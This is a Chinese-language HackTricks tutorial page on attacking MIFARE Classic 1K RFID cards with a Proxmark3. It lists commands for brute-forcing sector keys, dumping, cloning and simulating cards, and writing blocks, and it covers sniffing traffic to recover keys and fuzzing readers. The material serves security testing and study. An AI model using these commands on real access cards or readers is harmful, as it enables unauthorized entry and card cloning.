hacktricks/todo/radio-hacking/proxmark-3.md

Proxmark 3

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• 你在一家网络安全公司工作吗？想要在HackTricks中看到你的公司广告吗？或者你想要获取PEASS的最新版本或下载HackTricks的PDF吗？请查看订阅计划！
• 发现我们的独家NFTs收藏品The PEASS Family
• 获取官方PEASS和HackTricks周边产品
• 加入💬 Discord群组或电报群组，或者关注我在Twitter上的🐦@carlospolopm。
• 通过向hacktricks repo 和hacktricks-cloud repo 提交PR来分享你的黑客技巧。

使用Proxmark3攻击RFID系统

首先，你需要有一个Proxmark3并且安装软件及其依赖项s。

攻击MIFARE Classic 1KB

它有16个扇区，每个扇区有4个块，每个块包含16B。UID位于扇区0块0中（不能更改）。
要访问每个扇区，你需要2个密钥（A和B），它们存储在每个扇区的块3中（扇区尾部）。扇区尾部还存储了访问位，使用这两个密钥对每个块进行读取和写入权限控制。
如果你知道第一个密钥，那么两个密钥都可以用来授予读取权限；如果你知道第二个密钥，那么两个密钥都可以用来授予写入权限（例如）。

可以执行多种攻击方法

proxmark3> hf mf #List attacks

proxmark3> hf mf chk *1 ? t ./client/default_keys.dic #Keys bruteforce
proxmark3> hf mf fchk 1 t # Improved keys BF

proxmark3> hf mf rdbl 0 A FFFFFFFFFFFF # Read block 0 with the key
proxmark3> hf mf rdsc 0 A FFFFFFFFFFFF # Read sector 0 with the key

proxmark3> hf mf dump 1 # Dump the information of the card (using creds inside dumpkeys.bin)
proxmark3> hf mf restore # Copy data to a new card
proxmark3> hf mf eload hf-mf-B46F6F79-data # Simulate card using dump
proxmark3> hf mf sim *1 u 8c61b5b4 # Simulate card using memory

proxmark3> hf mf eset 01 000102030405060708090a0b0c0d0e0f # Write those bytes to block 1
proxmark3> hf mf eget 01 # Read block 1
proxmark3> hf mf wrbl 01 B FFFFFFFFFFFF 000102030405060708090a0b0c0d0e0f # Write to the card

Proxmark3允许执行其他操作，如窃听标签与读卡器之间的通信，以尝试找到敏感数据。在这种卡片中，您可以仅仅通过嗅探通信并计算使用的密钥，因为使用的加密操作是薄弱的，通过知道明文和密文，您可以计算出它（mfkey64工具）。

原始命令

物联网系统有时使用非品牌或非商业标签。在这种情况下，您可以使用Proxmark3向标签发送自定义的原始命令。

proxmark3> hf search UID : 80 55 4b 6c ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
No chinese magic backdoor command detected
Prng detection: WEAK
Valid ISO14443A Tag Found - Quiting Search

通过这些信息，您可以尝试搜索有关该卡片以及与其通信的方式的信息。Proxmark3允许发送原始命令，例如：hf 14a raw -p -b 7 26

脚本

Proxmark3软件附带了一系列自动化脚本，您可以使用这些脚本执行简单的任务。要检索完整列表，请使用script list命令。然后，使用script run命令，后跟脚本的名称：

proxmark3> script run mfkeys

您可以创建一个脚本来模糊测试标签读卡器，通过复制一个有效卡片的数据，编写一个Lua脚本来随机化一个或多个随机字节，并检查读卡器在任何迭代中是否崩溃。

☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 YouTube 🎥

• 您在网络安全公司工作吗？您想在HackTricks中看到您的公司广告吗？或者您想要访问PEASS的最新版本或下载PDF格式的HackTricks吗？请查看订阅计划！
• 发现我们的独家NFT收藏品The PEASS Family
• 获取官方PEASS和HackTricks周边产品
• 加入💬 Discord群组 或 Telegram群组 或 关注我在Twitter上的🐦@carlospolopm。
• 通过向hacktricks repo 和hacktricks-cloud repo 提交PR来分享您的黑客技巧。